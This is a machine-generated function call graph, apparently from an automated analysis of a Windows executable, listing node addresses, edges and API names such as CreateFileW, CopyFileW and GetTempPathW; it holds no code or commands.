fde822 335 API calls 95016->95019 95157 f94300 335 API calls _memcpy_s 95017->95157 95025 f946e4 Mailbox 95018->95025 95021 ff6e11 95019->95021 95022 f94739 Mailbox 95021->95022 95158 fccc5c 86 API calls 4 library calls 95021->95158 95022->94750 95024 f94659 95024->95021 95024->95022 95024->95025 95029 fd6ff0 335 API calls 95025->95029 95107 fc6524 95025->95107 95110 fcfa0c 95025->95110 95151 f84252 95025->95151 95029->95022 95030->94726 95031->94731 95961 f8bd30 95032->95961 95034 f93267 95035 f932f8 95034->95035 95036 ff907a 95034->95036 95096 f93628 95034->95096 96034 f9c36b 86 API calls 95035->96034 96040 fccc5c 86 API calls 4 library calls 95036->96040 95041 ff91fa 96045 fccc5c 86 API calls 4 library calls 95041->96045 95042 f93313 95092 f934eb _memcpy_s Mailbox 95042->95092 95042->95096 95097 ff94df 95042->95097 95966 f82b7a 95042->95966 95046 ff926d 96049 fccc5c 86 API calls 4 library calls 95046->96049 95047 ff93c5 95050 f8fe30 335 API calls 95047->95050 95048 ff909a 95048->95041 95051 f8d645 53 API calls 95048->95051 95052 ff9407 95050->95052 95053 ff910c 95051->95053 95052->95096 96054 f8d6e9 95052->96054 95057 ff9114 95053->95057 95058 ff9220 95053->95058 95055 f933ce 95059 ff945e 95055->95059 95060 f93465 95055->95060 95055->95092 95070 ff9128 95057->95070 95076 ff9152 95057->95076 96046 f81caa 49 API calls 95058->96046 96059 fcc942 50 API calls 95059->96059 95066 f9f4ea 48 API calls 95060->95066 95083 f9346c 95066->95083 95067 ff9438 96058 fccc5c 86 API calls 4 library calls 95067->96058 95068 ff923d 95072 ff925e 95068->95072 95073 ff9252 95068->95073 95069 f8fe30 335 API calls 95069->95092 96041 fccc5c 86 API calls 4 library calls 95070->96041 95071 f9c3c3 48 API calls 95071->95092 96048 fccc5c 86 API calls 4 library calls 95072->96048 96047 fccc5c 86 API calls 4 library calls 95073->96047 95080 ff9177 95076->95080 95084 ff9195 95076->95084 95077 f9f4ea 48 API calls 95077->95092 96042 fdf320 335 API calls 95080->96042 95088 f9351f 95083->95088 95973 f8e8d0 95083->95973 95085 ff918b 95084->95085 96043 fdf5ee 335 API calls 95084->96043 95085->95096 96044 f9c2d6 48 API calls _memcpy_s 95085->96044 95090 f86eed 48 API calls 95088->95090 95091 f93540 95088->95091 95090->95091 95091->95096 95098 ff94b0 95091->95098 95100 f93585 95091->95100 95092->95046 95092->95047 95092->95048 95092->95067 95092->95069 95092->95071 95092->95077 95092->95088 95093 ff9394 95092->95093 95092->95096 96036 f8d9a0 53 API calls __cinit 95092->96036 96037 f8d8c0 53 API calls 95092->96037 96038 f9c2d6 48 API calls _memcpy_s 95092->96038 96050 fdcda2 82 API calls Mailbox 95092->96050 96051 fc80e3 53 API calls 95092->96051 96052 f8d764 55 API calls 95092->96052 96053 f8dcae 50 API calls Mailbox 95092->96053 95095 f9f4ea 48 API calls 95093->95095 95095->95047 95103 f93635 Mailbox 95096->95103 96039 fccc5c 86 API calls 4 library calls 95096->96039 95097->95096 96061 fccc5c 86 API calls 4 library calls 95097->96061 96060 f8dcae 50 API calls Mailbox 95098->96060 95100->95096 95100->95097 95101 f93615 95100->95101 96035 f8dcae 50 API calls Mailbox 95101->96035 95103->94750 95104->94742 95105->94744 95106->94748 95159 fc6ca9 GetFileAttributesW 95107->95159 95111 fcfa1c __ftell_nolock 95110->95111 95112 fcfa44 95111->95112 95251 f8d286 48 API calls 95111->95251 95114 f8936c 81 API calls 95112->95114 95115 fcfa5e 95114->95115 95116 fcfb68 95115->95116 95117 fcfa80 95115->95117 95127 fcfb92 95115->95127 95163 f841a9 95116->95163 95119 f8936c 81 API calls 95117->95119 95124 fcfa8c _wcscpy _wcschr 95119->95124 95121 fcfb8e 95123 f8936c 81 API calls 95121->95123 95121->95127 95122 f841a9 136 API calls 95122->95121 95125 fcfbc7 95123->95125 95130 fcfab0 _wcscat _wcscpy 95124->95130 95134 fcfade _wcscat 95124->95134 95187 fa1dfc 95125->95187 95127->95022 95128 f8936c 81 API calls 95129 fcfafc _wcscpy 95128->95129 95252 fc72cb GetFileAttributesW 95129->95252 95133 f8936c 81 API calls 95130->95133 95131 fcfbeb _wcscat _wcscpy 95138 f8936c 81 API calls 95131->95138 95133->95134 95134->95128 95135 fcfb1c __NMSG_WRITE 95135->95127 95136 f8936c 81 API calls 95135->95136 95137 fcfb48 95136->95137 95253 fc60dd 77 API calls 4 library calls 95137->95253 95141 fcfc82 95138->95141 95140 fcfb5c 95140->95127 95190 fc690b 95141->95190 95143 fcfca2 95144 fc6524 3 API calls 95143->95144 95145 fcfcb1 95144->95145 95146 f8936c 81 API calls 95145->95146 95148 fcfce2 95145->95148 95147 fcfccb 95146->95147 95196 fcbfa4 95147->95196 95150 f84252 84 API calls 95148->95150 95150->95127 95152 f8425c 95151->95152 95153 f84263 95151->95153 95154 fa35e4 __fcloseall 83 API calls 95152->95154 95155 f84272 95153->95155 95156 f84283 FreeLibrary 95153->95156 95154->95153 95155->95022 95156->95155 95157->95024 95158->95022 95160 fc6529 95159->95160 95161 fc6cc4 FindFirstFileW 95159->95161 95160->95022 95161->95160 95162 fc6cd9 FindClose 95161->95162 95162->95160 95254 f84214 95163->95254 95168 ff4f73 95170 f84252 84 API calls 95168->95170 95169 f841d4 LoadLibraryExW 95264 f84291 95169->95264 95172 ff4f7a 95170->95172 95175 f84291 3 API calls 95172->95175 95177 ff4f82 95175->95177 95176 f841fb 95176->95177 95178 f84207 95176->95178 95290 f844ed 95177->95290 95179 f84252 84 API calls 95178->95179 95181 f8420c 95179->95181 95181->95121 95181->95122 95184 ff4fa9 95298 f84950 95184->95298 95593 fa1e46 95187->95593 95191 fc6918 _wcschr __ftell_nolock 95190->95191 95192 fa1dfc __wsplitpath 47 API calls 95191->95192 95195 fc692e _wcscat _wcscpy 95191->95195 95193 fc695d 95192->95193 95194 fa1dfc __wsplitpath 47 API calls 95193->95194 95194->95195 95195->95143 95197 fcbfb1 __ftell_nolock 95196->95197 95198 f9f4ea 48 API calls 95197->95198 95199 fcc00e 95198->95199 95200 f847b7 48 API calls 95199->95200 95201 fcc018 95200->95201 95202 fcbdb4 GetSystemTimeAsFileTime 95201->95202 95203 fcc023 95202->95203 95204 f84517 83 API calls 95203->95204 95205 fcc036 _wcscmp 95204->95205 95206 fcc05a 95205->95206 95207 fcc107 95205->95207 95649 fcc56d 95206->95649 95209 fcc56d 94 API calls 95207->95209 95224 fcc0d3 _wcscat 95209->95224 95211 fa1dfc __wsplitpath 47 API calls 95216 fcc088 _wcscat _wcscpy 95211->95216 95212 f844ed 64 API calls 95214 fcc12c 95212->95214 95213 fcc110 95213->95148 95215 f844ed 64 API calls 95214->95215 95217 fcc13c 95215->95217 95219 fa1dfc __wsplitpath 47 API calls 95216->95219 95218 f844ed 64 API calls 95217->95218 95220 fcc157 95218->95220 95219->95224 95221 f844ed 64 API calls 95220->95221 95222 fcc167 95221->95222 95223 f844ed 64 API calls 95222->95223 95225 fcc182 95223->95225 95224->95212 95224->95213 95226 f844ed 64 API calls 95225->95226 95227 fcc192 95226->95227 95228 f844ed 64 API calls 95227->95228 95229 fcc1a2 95228->95229 95230 f844ed 64 API calls 95229->95230 95231 fcc1b2 95230->95231 95619 fcc71a GetTempPathW GetTempFileNameW 95231->95619 95233 fcc1be 95234 fa3499 117 API calls 95233->95234 95245 fcc1cf 95234->95245 95235 fcc289 95633 fa35e4 95235->95633 95237 fcc294 95239 fcc2ae 95237->95239 95240 fcc29a DeleteFileW 95237->95240 95238 f844ed 64 API calls 95238->95245 95241 fcc342 CopyFileW 95239->95241 95246 fcc2b8 95239->95246 95240->95213 95242 fcc358 DeleteFileW 95241->95242 95243 fcc36a DeleteFileW 95241->95243 95242->95213 95646 fcc6d9 CreateFileW 95243->95646 95245->95213 95245->95235 95245->95238 95620 fa2aae 95245->95620 95655 fcb965 95246->95655 95250 fcc331 DeleteFileW 95250->95213 95251->95112 95252->95135 95253->95140 95303 f84339 95254->95303 95256 f8423c 95259 f841bb 95256->95259 95260 f84244 FreeLibrary 95256->95260 95261 fa3499 95259->95261 95260->95259 95311 fa34ae 95261->95311 95263 f841c8 95263->95168 95263->95169 95507 f842e4 95264->95507 95267 f842b8 95269 f841ec 95267->95269 95270 f842c1 FreeLibrary 95267->95270 95271 f84380 95269->95271 95270->95269 95272 f9f4ea 48 API calls 95271->95272 95273 f84395 95272->95273 95274 f847b7 48 API calls 95273->95274 95275 f843a1 _memcpy_s 95274->95275 95276 f843dc 95275->95276 95277 f84499 95275->95277 95278 f844d1 95275->95278 95279 f84950 57 API calls 95276->95279 95515 f8406b CreateStreamOnHGlobal 95277->95515 95526 fcc750 93 API calls 95278->95526 95289 f843e5 95279->95289 95282 f844ed 64 API calls 95282->95289 95283 f84479 95283->95176 95285 ff4ed7 95286 f84517 83 API calls 95285->95286 95287 ff4eeb 95286->95287 95288 f844ed 64 API calls 95287->95288 95288->95283 95289->95282 95289->95283 95289->95285 95521 f84517 95289->95521 95291 f844ff 95290->95291 95292 ff4fc0 95290->95292 95550 fa381e 95291->95550 95295 fcbf5a 95570 fcbdb4 95295->95570 95297 fcbf70 95297->95184 95299 f8495f 95298->95299 95301 ff5002 95298->95301 95575 fa3e65 95299->95575 95302 f84967 95307 f8434b 95303->95307 95306 f84321 LoadLibraryA GetProcAddress 95306->95256 95308 f8422f 95307->95308 95309 f84354 LoadLibraryA 95307->95309 95308->95256 95308->95306 95309->95308 95310 f84365 GetProcAddress 95309->95310 95310->95308 95314 fa34ba __fcloseall 95311->95314 95312 fa34cd 95359 fa7c0e 47 API calls __getptd_noexit 95312->95359 95314->95312 95316 fa34fe 95314->95316 95315 fa34d2 95360 fa6e10 8 API calls strtoxl 95315->95360 95330 fae4c8 95316->95330 95319 fa3503 95320 fa3519 95319->95320 95321 fa350c 95319->95321 95323 fa3543 95320->95323 95324 fa3523 95320->95324 95361 fa7c0e 47 API calls __getptd_noexit 95321->95361 95344 fae5e0 95323->95344 95362 fa7c0e 47 API calls __getptd_noexit 95324->95362 95327 fa34dd __fcloseall @_EH4_CallFilterFunc@8 95327->95263 95331 fae4d4 __fcloseall 95330->95331 95364 fa7cf4 95331->95364 95333 fae552 95371 fae5d7 95333->95371 95334 fae559 95400 fa69d0 47 API calls __malloc_crt 95334->95400 95337 fae560 95337->95333 95339 fae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95337->95339 95338 fae5cc __fcloseall 95338->95319 95339->95333 95342 fae4e2 95342->95333 95342->95334 95374 fa7d7c 95342->95374 95398 fa4e5b 48 API calls __lock 95342->95398 95399 fa4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95342->95399 95353 fae600 __wopenfile 95344->95353 95345 fae61a 95412 fa7c0e 47 API calls __getptd_noexit 95345->95412 95346 fae7d5 95346->95345 95350 fae838 95346->95350 95348 fae61f 95413 fa6e10 8 API calls strtoxl 95348->95413 95409 fb63c9 95350->95409 95351 fa354e 95363 fa3570 LeaveCriticalSection LeaveCriticalSection _fprintf 95351->95363 95353->95345 95353->95346 95353->95353 95414 fa185b 59 API calls 2 library calls 95353->95414 95355 fae7ce 95355->95346 95415 fa185b 59 API calls 2 library calls 95355->95415 95357 fae7ed 95357->95346 95416 fa185b 59 API calls 2 library calls 95357->95416 95359->95315 95360->95327 95361->95327 95362->95327 95363->95327 95365 fa7d18 EnterCriticalSection 95364->95365 95366 fa7d05 95364->95366 95365->95342 95367 fa7d7c __mtinitlocknum 46 API calls 95366->95367 95368 fa7d0b 95367->95368 95368->95365 95401 fa115b 47 API calls 3 library calls 95368->95401 95402 fa7e58 LeaveCriticalSection 95371->95402 95373 fae5de 95373->95338 95375 fa7d88 __fcloseall 95374->95375 95376 fa7da9 95375->95376 95377 fa7d91 95375->95377 95379 fa7da7 95376->95379 95385 fa7e11 __fcloseall 95376->95385 95403 fa81c2 47 API calls 2 library calls 95377->95403 95379->95376 95406 fa69d0 47 API calls __malloc_crt 95379->95406 95380 fa7d96 95404 fa821f 47 API calls 7 library calls 95380->95404 95383 fa7dbd 95386 fa7dd3 95383->95386 95387 fa7dc4 95383->95387 95384 fa7d9d 95405 fa1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95384->95405 95385->95342 95388 fa7cf4 __lock 46 API calls 95386->95388 95407 fa7c0e 47 API calls __getptd_noexit 95387->95407 95391 fa7dda 95388->95391 95393 fa7de9 InitializeCriticalSectionAndSpinCount 95391->95393 95394 fa7dfe 95391->95394 95392 fa7dc9 95392->95385 95395 fa7e04 95393->95395 95396 fa1c9d _free 46 API calls 95394->95396 95408 fa7e1a LeaveCriticalSection _doexit 95395->95408 95396->95395 95398->95342 95399->95342 95400->95337 95402->95373 95403->95380 95404->95384 95406->95383 95407->95392 95408->95385 95417 fb5bb1 95409->95417 95411 fb63e2 95411->95351 95412->95348 95413->95351 95414->95355 95415->95357 95416->95346 95418 fb5bbd __fcloseall 95417->95418 95419 fb5bcf 95418->95419 95422 fb5c06 95418->95422 95504 fa7c0e 47 API calls __getptd_noexit 95419->95504 95421 fb5bd4 95505 fa6e10 8 API calls strtoxl 95421->95505 95428 fb5c78 95422->95428 95425 fb5c23 95506 fb5c4c LeaveCriticalSection __unlock_fhandle 95425->95506 95427 fb5bde __fcloseall 95427->95411 95429 fb5c98 95428->95429 95430 fa273b __wsopen_helper 47 API calls 95429->95430 95433 fb5cb4 95430->95433 95431 fb5deb 95432 fa6e20 __invoke_watson 8 API calls 95431->95432 95434 fb63c8 95432->95434 95433->95431 95435 fb5cee 95433->95435 95446 fb5d11 95433->95446 95436 fb5bb1 __wsopen_helper 104 API calls 95434->95436 95437 fa7bda __set_osfhnd 47 API calls 95435->95437 95438 fb63e2 95436->95438 95439 fb5cf3 95437->95439 95438->95425 95440 fa7c0e strtoxl 47 API calls 95439->95440 95441 fb5d00 95440->95441 95443 fa6e10 strtoxl 8 API calls 95441->95443 95442 fb5dcf 95444 fa7bda __set_osfhnd 47 API calls 95442->95444 95445 fb5d0a 95443->95445 95447 fb5dd4 95444->95447 95445->95425 95446->95442 95450 fb5dad 95446->95450 95448 fa7c0e strtoxl 47 API calls 95447->95448 95449 fb5de1 95448->95449 95451 fa6e10 strtoxl 8 API calls 95449->95451 95452 faa979 __wsopen_helper 52 API calls 95450->95452 95451->95431 95453 fb5e7b 95452->95453 95454 fb5ea6 95453->95454 95455 fb5e85 95453->95455 95457 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95454->95457 95456 fa7bda __set_osfhnd 47 API calls 95455->95456 95458 fb5e8a 95456->95458 95468 fb5ec8 95457->95468 95459 fa7c0e strtoxl 47 API calls 95458->95459 95461 fb5e94 95459->95461 95460 fb5f46 GetFileType 95462 fb5f93 95460->95462 95463 fb5f51 GetLastError 95460->95463 95466 fa7c0e strtoxl 47 API calls 95461->95466 95473 faac0b __set_osfhnd 48 API calls 95462->95473 95467 fa7bed __dosmaperr 47 API calls 95463->95467 95464 fb5f14 GetLastError 95465 fa7bed __dosmaperr 47 API calls 95464->95465 95470 fb5f39 95465->95470 95466->95445 95471 fb5f78 CloseHandle 95467->95471 95468->95460 95468->95464 95469 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95468->95469 95472 fb5f09 95469->95472 95475 fa7c0e strtoxl 47 API calls 95470->95475 95471->95470 95474 fb5f86 95471->95474 95472->95460 95472->95464 95479 fb5fb1 95473->95479 95476 fa7c0e strtoxl 47 API calls 95474->95476 95475->95431 95477 fb5f8b 95476->95477 95477->95470 95478 fb616c 95478->95431 95481 fb633f CloseHandle 95478->95481 95479->95478 95480 faf82f __lseeki64_nolock 49 API calls 95479->95480 95496 fb6032 95479->95496 95482 fb601b 95480->95482 95483 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95481->95483 95485 fa7bda __set_osfhnd 47 API calls 95482->95485 95501 fb603a 95482->95501 95484 fb6366 95483->95484 95486 fb636e GetLastError 95484->95486 95487 fb61f6 95484->95487 95485->95496 95488 fa7bed __dosmaperr 47 API calls 95486->95488 95487->95431 95489 fb637a 95488->95489 95493 faab1e __free_osfhnd 48 API calls 95489->95493 95490 faee0e 59 API calls __filbuf 95490->95501 95491 faea9c __close_nolock 50 API calls 95491->95501 95492 fb6f40 __chsize_nolock 81 API calls 95492->95501 95493->95487 95494 faf82f 49 API calls __lseeki64_nolock 95494->95496 95495 faaf61 __flush 78 API calls 95495->95496 95496->95478 95496->95494 95496->95495 95496->95501 95497 fb61e9 95499 faea9c __close_nolock 50 API calls 95497->95499 95498 fb61d2 95498->95478 95500 fb61f0 95499->95500 95502 fa7c0e strtoxl 47 API calls 95500->95502 95501->95490 95501->95491 95501->95492 95501->95496 95501->95497 95501->95498 95503 faf82f 49 API calls __lseeki64_nolock 95501->95503 95502->95487 95503->95501 95504->95421 95505->95427 95506->95427 95511 f842f6 95507->95511 95510 f842cc LoadLibraryA GetProcAddress 95510->95267 95512 f842aa 95511->95512 95513 f842ff LoadLibraryA 95511->95513 95512->95267 95512->95510 95513->95512 95514 f84310 GetProcAddress 95513->95514 95514->95512 95516 f84085 FindResourceExW 95515->95516 95518 f840a2 95515->95518 95517 ff4f16 LoadResource 95516->95517 95516->95518 95517->95518 95519 ff4f2b SizeofResource 95517->95519 95518->95276 95519->95518 95520 ff4f3f LockResource 95519->95520 95520->95518 95522 f84526 95521->95522 95523 ff4fe0 95521->95523 95527 fa3a8d 95522->95527 95525 f84534 95525->95289 95526->95276 95531 fa3a99 __fcloseall 95527->95531 95528 fa3aa7 95540 fa7c0e 47 API calls __getptd_noexit 95528->95540 95530 fa3acd 95542 fa4e1c 95530->95542 95531->95528 95531->95530 95532 fa3aac 95541 fa6e10 8 API calls strtoxl 95532->95541 95537 fa3ae2 95549 fa3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95537->95549 95539 fa3ab7 __fcloseall 95539->95525 95540->95532 95541->95539 95543 fa4e4e EnterCriticalSection 95542->95543 95544 fa4e2c 95542->95544 95546 fa3ad3 95543->95546 95544->95543 95545 fa4e34 95544->95545 95547 fa7cf4 __lock 47 API calls 95545->95547 95548 fa39fe 81 API calls 4 library calls 95546->95548 95547->95546 95548->95537 95549->95539 95553 fa3839 95550->95553 95552 f84510 95552->95295 95554 fa3845 __fcloseall 95553->95554 95555 fa3880 __fcloseall 95554->95555 95556 fa385b _memset 95554->95556 95557 fa3888 95554->95557 95555->95552 95566 fa7c0e 47 API calls __getptd_noexit 95556->95566 95558 fa4e1c __lock_file 48 API calls 95557->95558 95560 fa388e 95558->95560 95568 fa365b 62 API calls 5 library calls 95560->95568 95561 fa3875 95567 fa6e10 8 API calls strtoxl 95561->95567 95564 fa38a4 95569 fa38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95564->95569 95566->95561 95567->95555 95568->95564 95569->95555 95573 fa344a GetSystemTimeAsFileTime 95570->95573 95572 fcbdc3 95572->95297 95574 fa3478 __aulldiv 95573->95574 95574->95572 95576 fa3e71 __fcloseall 95575->95576 95577 fa3e7f 95576->95577 95578 fa3e94 95576->95578 95589 fa7c0e 47 API calls __getptd_noexit 95577->95589 95580 fa4e1c __lock_file 48 API calls 95578->95580 95582 fa3e9a 95580->95582 95581 fa3e84 95590 fa6e10 8 API calls strtoxl 95581->95590 95591 fa3b0c 55 API calls 5 library calls 95582->95591 95585 fa3ea5 95592 fa3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95585->95592 95587 fa3eb7 95588 fa3e8f __fcloseall 95587->95588 95588->95302 95589->95581 95590->95588 95591->95585 95592->95587 95594 fa1e61 95593->95594 95598 fa1e55 95593->95598 95617 fa7c0e 47 API calls __getptd_noexit 95594->95617 95596 fa2019 95601 fa1e41 95596->95601 95618 fa6e10 8 API calls strtoxl 95596->95618 95598->95594 95606 fa1ed4 95598->95606 95612 fa9d6b 47 API calls strtoxl 95598->95612 95600 fa1fa0 95600->95594 95600->95601 95603 fa1fb0 95600->95603 95601->95131 95602 fa1f5f 95602->95594 95604 fa1f7b 95602->95604 95614 fa9d6b 47 API calls strtoxl 95602->95614 95616 fa9d6b 47 API calls strtoxl 95603->95616 95604->95594 95604->95601 95608 fa1f91 95604->95608 95606->95594 95611 fa1f41 95606->95611 95613 fa9d6b 47 API calls strtoxl 95606->95613 95615 fa9d6b 47 API calls strtoxl 95608->95615 95611->95600 95611->95602 95612->95606 95613->95611 95614->95604 95615->95601 95616->95601 95617->95596 95618->95601 95619->95233 95621 fa2aba __fcloseall 95620->95621 95622 fa2aec 95621->95622 95623 fa2ad4 95621->95623 95624 fa2ae4 __fcloseall 95621->95624 95625 fa4e1c __lock_file 48 API calls 95622->95625 95698 fa7c0e 47 API calls __getptd_noexit 95623->95698 95624->95245 95627 fa2af2 95625->95627 95686 fa2957 95627->95686 95628 fa2ad9 95699 fa6e10 8 API calls strtoxl 95628->95699 95634 fa35f0 __fcloseall 95633->95634 95635 fa361c 95634->95635 95636 fa3604 95634->95636 95638 fa4e1c __lock_file 48 API calls 95635->95638 95642 fa3614 __fcloseall 95635->95642 95876 fa7c0e 47 API calls __getptd_noexit 95636->95876 95640 fa362e 95638->95640 95639 fa3609 95877 fa6e10 8 API calls strtoxl 95639->95877 95860 fa3578 95640->95860 95642->95237 95647 fcc6ff SetFileTime CloseHandle 95646->95647 95648 fcc715 95646->95648 95647->95648 95648->95213 95650 fcc581 __tzset_nolock _wcscmp 95649->95650 95651 f844ed 64 API calls 95650->95651 95652 fcc05f 95650->95652 95653 fcbf5a GetSystemTimeAsFileTime 95650->95653 95654 f84517 83 API calls 95650->95654 95651->95650 95652->95211 95652->95213 95653->95650 95654->95650 95656 fcb97e 95655->95656 95657 fcb970 95655->95657 95659 fcb9c3 95656->95659 95660 fa3499 117 API calls 95656->95660 95682 fcb987 95656->95682 95658 fa3499 117 API calls 95657->95658 95658->95656 95950 fcbbe8 64 API calls 3 library calls 95659->95950 95662 fcb9a8 95660->95662 95662->95659 95663 fcb9b1 95662->95663 95667 fa35e4 __fcloseall 83 API calls 95663->95667 95663->95682 95664 fcba07 95665 fcba2c 95664->95665 95666 fcba0b 95664->95666 95951 fcb7e5 47 API calls __malloc_crt 95665->95951 95669 fcba18 95666->95669 95671 fa35e4 __fcloseall 83 API calls 95666->95671 95667->95682 95674 fa35e4 __fcloseall 83 API calls 95669->95674 95669->95682 95670 fcba34 95672 fcba5a 95670->95672 95673 fcba3a 95670->95673 95671->95669 95952 fcba8a 90 API calls 95672->95952 95675 fcba47 95673->95675 95678 fa35e4 __fcloseall 83 API calls 95673->95678 95674->95682 95680 fa35e4 __fcloseall 83 API calls 95675->95680 95675->95682 95677 fcba61 95953 fcbb64 95677->95953 95678->95675 95680->95682 95682->95243 95682->95250 95683 fcba75 95683->95682 95685 fa35e4 __fcloseall 83 API calls 95683->95685 95684 fa35e4 __fcloseall 83 API calls 95684->95683 95685->95682 95688 fa2966 95686->95688 95695 fa2984 95686->95695 95687 fa2974 95733 fa7c0e 47 API calls __getptd_noexit 95687->95733 95688->95687 95690 fa299c _memcpy_s 95688->95690 95688->95695 95690->95695 95701 fa2933 95690->95701 95708 faaf61 95690->95708 95735 fa2c84 95690->95735 95741 fa8e63 78 API calls 7 library calls 95690->95741 95691 fa2979 95734 fa6e10 8 API calls strtoxl 95691->95734 95700 fa2b24 LeaveCriticalSection LeaveCriticalSection _fprintf 95695->95700 95698->95628 95699->95624 95700->95624 95702 fa293d 95701->95702 95703 fa2952 95701->95703 95742 fa7c0e 47 API calls __getptd_noexit 95702->95742 95703->95690 95705 fa2942 95743 fa6e10 8 API calls strtoxl 95705->95743 95707 fa294d 95707->95690 95709 faaf6d __fcloseall 95708->95709 95710 faaf8d 95709->95710 95711 faaf75 95709->95711 95713 fab022 95710->95713 95718 faafbf 95710->95718 95817 fa7bda 47 API calls __getptd_noexit 95711->95817 95822 fa7bda 47 API calls __getptd_noexit 95713->95822 95714 faaf7a 95818 fa7c0e 47 API calls __getptd_noexit 95714->95818 95717 fab027 95823 fa7c0e 47 API calls __getptd_noexit 95717->95823 95744 faa8ed 95718->95744 95721 fab02f 95824 fa6e10 8 API calls strtoxl 95721->95824 95722 faafc5 95724 faafeb 95722->95724 95725 faafd8 95722->95725 95819 fa7c0e 47 API calls __getptd_noexit 95724->95819 95753 fab043 95725->95753 95726 faaf82 __fcloseall 95726->95690 95729 faafe4 95821 fab01a LeaveCriticalSection __unlock_fhandle 95729->95821 95730 faaff0 95820 fa7bda 47 API calls __getptd_noexit 95730->95820 95733->95691 95734->95695 95736 fa2cbb 95735->95736 95737 fa2c97 95735->95737 95736->95690 95737->95736 95738 fa2933 __fseek_nolock 47 API calls 95737->95738 95739 fa2cb4 95738->95739 95740 faaf61 __flush 78 API calls 95739->95740 95740->95736 95741->95690 95742->95705 95743->95707 95745 faa8f9 __fcloseall 95744->95745 95746 faa946 EnterCriticalSection 95745->95746 95747 fa7cf4 __lock 47 API calls 95745->95747 95748 faa96c __fcloseall 95746->95748 95749 faa91d 95747->95749 95748->95722 95750 faa93a 95749->95750 95751 faa928 InitializeCriticalSectionAndSpinCount 95749->95751 95825 faa970 LeaveCriticalSection _doexit 95750->95825 95751->95750 95754 fab050 __ftell_nolock 95753->95754 95755 fab0ac 95754->95755 95756 fab08d 95754->95756 95785 fab082 95754->95785 95759 fab105 95755->95759 95760 fab0e9 95755->95760 95835 fa7bda 47 API calls __getptd_noexit 95756->95835 95764 fab11c 95759->95764 95841 faf82f 49 API calls 3 library calls 95759->95841 95838 fa7bda 47 API calls __getptd_noexit 95760->95838 95761 fab86b 95761->95729 95762 fab092 95836 fa7c0e 47 API calls __getptd_noexit 95762->95836 95826 fb3bf2 95764->95826 95767 fab0ee 95839 fa7c0e 47 API calls __getptd_noexit 95767->95839 95769 fab099 95837 fa6e10 8 API calls strtoxl 95769->95837 95770 fab12a 95773 fab44b 95770->95773 95842 fa7a0d 47 API calls 2 library calls 95770->95842 95775 fab7b8 WriteFile 95773->95775 95776 fab463 95773->95776 95774 fab0f5 95840 fa6e10 8 API calls strtoxl 95774->95840 95781 fab150 GetConsoleMode 95781->95773 95849 faa70c 95785->95849 95817->95714 95818->95726 95819->95730 95820->95729 95821->95726 95822->95717 95823->95721 95824->95726 95825->95746 95827 fb3c0a 95826->95827 95828 fb3bfd 95826->95828 95831 fb3c16 95827->95831 95857 fa7c0e 47 API calls __getptd_noexit 95827->95857 95856 fa7c0e 47 API calls __getptd_noexit 95828->95856 95830 fb3c02 95830->95770 95831->95770 95833 fb3c37 95858 fa6e10 8 API calls strtoxl 95833->95858 95835->95762 95836->95769 95837->95785 95838->95767 95839->95774 95840->95785 95841->95764 95842->95781 95850 faa716 IsProcessorFeaturePresent 95849->95850 95851 faa714 95849->95851 95853 fb37b0 95850->95853 95851->95761 95859 fb375f 5 API calls 2 library calls 95853->95859 95855 fb3893 95855->95761 95856->95830 95857->95833 95858->95830 95859->95855 95861 fa359b 95860->95861 95862 fa3587 95860->95862 95864 fa3597 95861->95864 95866 fa2c84 __flush 78 API calls 95861->95866 95906 fa7c0e 47 API calls __getptd_noexit 95862->95906 95878 fa3653 LeaveCriticalSection LeaveCriticalSection _fprintf 95864->95878 95865 fa358c 95907 fa6e10 8 API calls strtoxl 95865->95907 95868 fa35a7 95866->95868 95879 faeb36 95868->95879 95871 fa2933 __fseek_nolock 47 API calls 95872 fa35b5 95871->95872 95883 fae9d2 95872->95883 95874 fa35bb 95874->95864 95875 fa1c9d _free 47 API calls 95874->95875 95875->95864 95876->95639 95877->95642 95878->95642 95880 fa35af 95879->95880 95881 faeb43 95879->95881 95880->95871 95881->95880 95882 fa1c9d _free 47 API calls 95881->95882 95882->95880 95884 fae9de __fcloseall 95883->95884 95885 fae9fe 95884->95885 95886 fae9e6 95884->95886 95887 faea7b 95885->95887 95892 faea28 95885->95892 95923 fa7bda 47 API calls __getptd_noexit 95886->95923 95927 fa7bda 47 API calls __getptd_noexit 95887->95927 95889 fae9eb 95924 fa7c0e 47 API calls __getptd_noexit 95889->95924 95891 faea80 95928 fa7c0e 47 API calls __getptd_noexit 95891->95928 95895 faa8ed ___lock_fhandle 49 API calls 95892->95895 95897 faea2e 95895->95897 95896 faea88 95929 fa6e10 8 API calls strtoxl 95896->95929 95899 faea4c 95897->95899 95900 faea41 95897->95900 95925 fa7c0e 47 API calls __getptd_noexit 95899->95925 95908 faea9c 95900->95908 95902 fae9f3 __fcloseall 95902->95874 95904 faea47 95926 faea73 LeaveCriticalSection __unlock_fhandle 95904->95926 95906->95865 95907->95864 95930 faaba4 95908->95930 95910 faeb00 95943 faab1e 48 API calls 2 library calls 95910->95943 95912 faeaaa 95912->95910 95913 faeade 95912->95913 95915 faaba4 __lseeki64_nolock 47 API calls 95912->95915 95913->95910 95916 faaba4 __lseeki64_nolock 47 API calls 95913->95916 95914 faeb08 95918 faead5 95915->95918 95919 faeaea CloseHandle 95916->95919 95921 faaba4 __lseeki64_nolock 47 API calls 95918->95921 95919->95910 95921->95913 95923->95889 95924->95902 95925->95904 95926->95902 95927->95891 95928->95896 95929->95902 95931 faabaf 95930->95931 95932 faabc4 95930->95932 95945 fa7bda 47 API calls __getptd_noexit 95931->95945 95936 faabe9 95932->95936 95947 fa7bda 47 API calls __getptd_noexit 95932->95947 95935 faabb4 95946 fa7c0e 47 API calls __getptd_noexit 95935->95946 95936->95912 95937 faabf3 95948 fa7c0e 47 API calls __getptd_noexit 95937->95948 95939 faabbc 95939->95912 95941 faabfb 95949 fa6e10 8 API calls strtoxl 95941->95949 95943->95914 95945->95935 95946->95939 95947->95937 95948->95941 95949->95939 95950->95664 95951->95670 95952->95677 95954 fcbb71 95953->95954 95957 fcbb77 95953->95957 95955 fa1c9d _free 47 API 